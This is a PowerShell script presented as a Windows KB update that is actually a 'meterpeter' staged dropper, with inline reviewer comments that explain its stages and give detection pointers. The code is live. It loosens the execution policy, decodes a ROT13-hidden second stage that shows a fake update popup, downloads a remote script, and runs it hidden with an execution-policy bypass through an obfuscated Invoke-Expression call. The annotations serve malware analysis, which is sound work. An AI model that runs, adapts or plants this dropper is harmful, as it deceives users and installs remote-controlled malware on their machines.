update.ps1
<#
.SYNOPSIS
Author: @r00t-3xp10it
Credits to: @Markus_Fleschut (rot13)
meterpeter standalone executable dropper
Change_For_Silent_Exec: [fgevat]`$FvyragRkrp=`"Gehr`"
#>
# NOTE(review): the statements below form a staged downloader. Little of the
# behaviour is visible to static string matching: one cmdlet name is split with
# filler characters, and the second stage is stored ROT13-encoded, decoded at
# run time and executed from memory. Decode $Rotten13 offline for analysis
# instead of running the script. The header's Change_For_Silent_Exec hint is
# itself ROT13 and decodes to a SilentExec parameter default of "True".

# Stripping the '@' and '£' filler characters leaves the command text
# "Set-ExecutionPolicy UnRestricted".
$linkinfodll = "@Se£@t-£E@xe£c@ut£i@on£P@o£li@c£y @U£nR@e£st@ric£t@e£d" -replace '(@|£)',''
# Runs that command with -Scope CurrentUser in a child PowerShell; "Y" is piped
# in (presumably to answer the confirmation prompt) and output is discarded.
# The policy change is per-user and is not reverted anywhere in this script, so
# it remains after execution and belongs on the remediation checklist.
# Execution policy is not a security boundary; the decoded stage below starts
# its child with "-exec bypass" regardless.
cmd /R echo Y|Powershell $linkinfodll -Scope CurrentUser|Out-Null
# ROT13-encoded second stage (backticks keep $ and " literal inside the string).
# Decoded, it:
#   - declares parameters OutFile (default "$Env:TMP\Update-KB5005101.ps1") and
#     SilentExec (default "False");
#   - sets $ErrorActionPreference to "SilentlyContinue";
#   - when SilentExec is "False", shows a Wscript.Shell popup titled
#     " Secure KB4569132 Update" whose body is licence-disclaimer text (a decoy);
#   - fetches Update-KB5005101.ps1 over plain http with iwr into OutFile, sending
#     an Android/Firefox User-Agent string;
#   - starts powershell.exe with -WindowStyle Hidden and
#     "-exec bypass -File <OutFile>", with an empty catch that hides failures.
# The URL host is the literal token "CharlieBrown", which is not ROT13-encoded
# like the rest — presumably a template placeholder filled in by build tooling;
# confirm against the builder before treating it as an indicator.
# Detection pointers: a .ps1 written under %TMP%, HTTP from powershell.exe with
# a mobile-browser User-Agent, and a hidden powershell.exe child launched with
# an execution-policy bypass. With Script Block Logging enabled (event 4104),
# the decoded text should be recorded when it reaches Invoke-Expression.
$Rotten13 = @("[PzqyrgOvaqvat(CbfvgvbanyOvaqvat=`$snyfr)] cnenz(
[fgevat]`$BhgSvyr=`"`$Rai:GZC\Hcqngr-XO5005101.cf1`",
[fgevat]`$FvyragRkrp=`"Snyfr`"
)
`$FRkrphgrq = `$ahyy
`$ReebeNpgvbaCersrerapr = `"FvyragylPbagvahr`"
Vs(`$FvyragRkrp -vrd `"Snyfr`"){`$HfreFrgGvatf = cbjrefuryy (Arj-Bowrpg -PbzBowrpg Jfpevcg.Furyy).Cbchc(`" Srngher hcqngr `a`aGUVF FBSGJNER VF CEBIVQRQ OL GUR ERTRAGF NAQ PBAGEVOHGBEF ``NF VF'' NAQ NAL RKCERFF BE VZCYVRQ JNEENAGVRF, VAPYHQVAT, OHG ABG YVZVGRQ GB GUR VZCYVRQ JNEENAGVRF BS ZREPUNAGNOVYVGL NAQ SVGARFF SBE N CNEGVPHYNE CHECBFR NER QVFPYNVZRQ. VA AB RIRAG FUNYY GUR ERTRAGF BE PBAGEVOHGBEF OR YVNOYR SBE NAL QVERPG, VAQVERPG, VAPVQRAGNY, FCRPVNY, RKRZCYNEL, BE PBAFRDHRAGVNY QNZNTRF (VAPYHQVAT, OHG ABG YVZVGRQ GB, CEBPHERZRAG BS FHOFGVGHGR TBBQF BE FREIVPRF; YBFF BS HFR, QNGN, BE CEBSVGF; BE OHFVARFF VAGREEHCGVBA) UBJRIRE PNHFRQ NAQ BA NAL GURBEL BS YVNOVYVGL, JURGURE VA PBAGENPG, FGEVPG YVNOVYVGL, BE GBEG (VAPYHQVAT ARTYVTRAPR BE BGUREJVFR) NEVFVAT VA NAL JNL BHG BS GUR HFR BS GUVF FBSGJNER, RIRA VS NQIVFRQ BS GUR CBFFVOVYVGL BS FHPU QNZNTR.`",6,`" Frpher XO4569132 Hcqngr`",1+0)}
vje -Hev `"uggc://CharlieBrown/Hcqngr-XO5005101.cf1`" -BhgSvyr `"`$BhgSvyr`" -HfreNtrag `"Zbmvyyn/5.0 (Naqebvq; Zbovyr; ei:40.0) Trpxb/40.0 Sversbk/40.0`"|Bhg-Ahyy
Fgneg-Fyrrc -Zvyyvfrpbaqf 300;`$n = Trg-Qngr
gel{#Rkrphgr zrgrecrgre pyvrag.cf1 va n puvyq cebprff qrgnpu sebz cnerag cebprff (onpxtebhaq)
Fgneg-Cebprff cbjrefuryy.rkr -JvaqbjFglyr Uvqqra -NethzragYvfg `"-rkrp olcnff -Svyr `$BhgSvyr`"|Bhg-Ahyy
}pngpu{}");$rdata = $null
# ROT13 decoder: character codes 97-109 / 65-77 (a-m / A-M) are shifted +13,
# codes 110-122 / 78-90 (n-z / N-Z) are shifted -13, and every other character
# (digits, punctuation, whitespace) is appended to $rdata unchanged.
$Rotten13.ToCharArray() | ForEach-Object {If((([int] $_ -ge 97) -and ([int] $_ -le 109)) -or (([int] $_ -ge 65) -and ([int] $_ -le 77))){$rdata += [char] ([int] $_ + 13)}ElseIf((([int] $_ -ge 110) -and ([int] $_ -le 122)) -or (([int] $_ -ge 78) -and ([int] $_ -le 90))){$rdata += [char] ([int] $_ - 13)}Else{$rdata += $_}}
# "DIR Alias:/I*X" looks the alias up by wildcard, so the name it resolves to
# (iex / Invoke-Expression on a default alias table) never appears literally in
# the file. The decoded text is piped to it and runs in memory. If that throws,
# a popup titled " KB5005101 Security Update" presents the failure to the user
# as a failed update package.
try{echo "$rdata"|&(DIR Alias:/I*X)}catch{powershell (New-Object -ComObject Wscript.Shell).Popup("Fail to execute KB5005101.exe Update Package",5," KB5005101 Security Update",0+16)}